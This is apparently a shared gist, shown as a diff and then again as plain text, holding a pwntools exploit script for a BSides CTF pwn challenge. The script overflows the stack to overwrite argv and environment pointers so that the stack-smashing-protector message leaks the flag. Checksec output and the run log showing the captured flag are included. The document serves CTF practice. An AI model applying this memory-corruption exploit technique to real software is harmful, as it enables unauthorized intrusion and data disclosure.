scarvell · April 28, 2017 02:41
diff --git a/noob_pwn.py b/noob_pwn.py
 #!/usr/bin/env python
 """
 There is no ASLR for this challenge

 gdb-peda$ checksec
 CANARY    : ENABLED
 FORTIFY   : disabled
 NX        : ENABLED
 PIE       : disabled
 RELRO     : FULL

 flag:
    0x400800 ("BSIDES_CTF{FLAGISHEREONTHESERVER!}")


 [mnz@noctis Downloads]$ ./noob_download
 Gimme the data: asdfasdfasdfasdf
 Go on then, break me: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 *** stack smashing detected ***: ./noob_download terminated
 Segmentation fault (core dumped)

 [mnz@noctis ~]$ ./noob_pwn_exploit.py 
 [+] Opening connection to 127.0.0.1 on port 6000: Done
 [+] Receiving all data: Done (116B)
 [*] Closed connection to 127.0.0.1 port 6000
 Gimme the data: Go on then, break me: *** stack smashing detected *** BSIDES_CTF{d3m_st@kk_proTectionz!} terminated

 """
 from pwn import *

 target = remote('127.0.0.1', 6000)
 exploit = "TERM=abc"                            # Requires TERM environment variable to be set
 exploit += "B" * 287                            # Fill stack with garbage
 exploit += "\x00\x08\x40\x00\x00\x00\x00\x00"   # Overwrite the argv pointer to where the flag is
 exploit += "C" * 8                              # Fill garbage
 exploit += "\x40\x10\x60\x00\x00\x00\x00\x00"   # Set our environment variable to point to `TERM=123`
 exploit += "\n"

 print target.recvall(target.send(exploit))
	#!/usr/bin/env python
	"""
	There is no ASLR for this challenge

	gdb-peda$ checksec
	CANARY : ENABLED
	FORTIFY : disabled
	NX : ENABLED
	PIE : disabled
	RELRO : FULL

	flag:
	0x400800 ("BSIDES_CTF{FLAGISHEREONTHESERVER!}")


	[mnz@noctis Downloads]$ ./noob_download
	Gimme the data: asdfasdfasdfasdf
	Go on then, break me: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
	* stack smashing detected *: ./noob_download terminated
	Segmentation fault (core dumped)

	[mnz@noctis ~]$ ./noob_pwn_exploit.py
	[+] Opening connection to 127.0.0.1 on port 6000: Done
	[+] Receiving all data: Done (116B)
	[*] Closed connection to 127.0.0.1 port 6000
	Gimme the data: Go on then, break me: * stack smashing detected * BSIDES_CTF{d3m_st@kk_proTectionz!} terminated

	"""
	from pwn import *

	target = remote('127.0.0.1', 6000)
	exploit = "TERM=abc" # Requires TERM environment variable to be set
	exploit += "B" * 287 # Fill stack with garbage
	exploit += "\x00\x08\x40\x00\x00\x00\x00\x00" # Overwrite the argv pointer to where the flag is
	exploit += "C" * 8 # Fill garbage
	exploit += "\x40\x10\x60\x00\x00\x00\x00\x00" # Set our environment variable to point to `TERM=123`
	exploit += "\n"

	print target.recvall(target.send(exploit))